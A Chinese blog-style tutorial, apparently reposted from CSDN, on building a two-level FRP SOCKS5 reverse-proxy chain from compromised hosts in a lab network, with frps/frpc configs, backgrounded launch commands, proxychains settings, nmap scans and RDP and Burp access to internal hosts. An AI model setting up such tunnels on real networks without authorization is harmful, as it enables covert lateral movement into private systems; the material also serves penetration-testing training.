FRP通过Socks5二层代理,访问内网三层网站
2023-4-23 08:2:55 Author: 李白你好(查看原文) 阅读量:35 收藏

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!今天咱们来学习一哈内网渗透代理利器FRP的使用。

昨天晚上星球内部直播正好讲到内网代理这一块课程中用到的是NPS+Proxifier搭建socks5进行内网穿透,这篇文章讲的是另一个代理工具FRP的用法。文章底部扫码加入星球,有不定时的内部直播课。

0x01 背景介绍


假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限

实现:

配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(192.168.52.30)

配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(192.168.93.30)

现在 ubuntu(web1)要充当frp客户端和frp服务端,以便访问第三层网络

0x02 FRP一级代理(反向)

端(server)

kali(192.168.0.107)

frps.ini--------------------------------------[common]#服务端监听端口,默认7000。监听来自客户端的流量请求bind_port = 7000--------------------------------------启动chmod +777 frps./frps -c ./frps.ini

客户端 (client)

ubuntu-web1(192.168.0.100)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,我们访问vps的7777端口就相当于访问客户端的7000端口frpc.ini---------------------[common]server_addr = 192.168.0.107server_port = 7000
[plugin_socks]type = tcpremote_port = 7777plugin = socks5----------------------启动chmod +777 frpcnohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

先启动服务器,在启动客户端

0x03 FRP二级代理

同时启动二层代理的服务端frps

ubuntu-web1(192.168.0.100)

frps.ini--------------------------------------[common]#服务端监听端口,默认7000。监听来自客户端的流量请求bind_addr = 192.168.52.10bind_port = 7000--------------------------------------启动chmod +777 frps./frps -c ./frps.ini

客户端 (client)

web-pc1(192.168.52.30)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,我们访问vps的7777端口就相当于访问客户端的7000端口frpc.ini---------------------[common]server_addr = 192.168.52.10server_port = 7000
[plugin_socks]type = tcpremote_port = 7777plugin = socks5----------------------启动chmod +777 frpcnohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

0x04 测试连接

kali本地添加proxy配置

vim /etc/proxychains4.conf ----------------------------------socks5  192.168.0.107 7777socks5 192.168.52.10 7777----------------------------------

第一步 通过代理,使用nmap进行扫描

扫描二层网络proxychains nmap -Pn -sT -sV -F -O 192.168.52.30 

扫描三层网络 proxychains nmap -Pn -sT -sV -F -O 192.168.93.40

第二步 远程连接

proxychains rdesktop 192.168.52.30

proxychains rdesktop 192.168.93.40

第三步 浏览器开启代理,访问内网系统

访问二层网络socks5 127.0.0.1 7777http://192.168.52.30:8080/

访问三层网络启动burp:proxychains  burpsuitefirfox代理:socks5 127.0.0.1 7777http  127.0.0.1 8080访问网站:http://192.168.52.30:8080/127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送

使用代理启动burp

浏览器开启burp代理

查看后台burp的代理包

0x05 链接获取

文章来源:CSND(星球守护者)

原文链接:https://blog.csdn.net/qq_41901122/article/details/127190123

0x06 往期精彩

红队小工具—迅速定位多网卡主机,找域控

某攻防演练绝处逢生


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247498098&idx=1&sn=b4f37fcff1fa035f41470a690eae0ea7&chksm=c09a8a22f7ed0334782a84e3152210e3e4214a1ebd6cd8fd54927c6cf8205cfbd1aa43fd5164#rd
如有侵权请联系:admin#unsafe.sh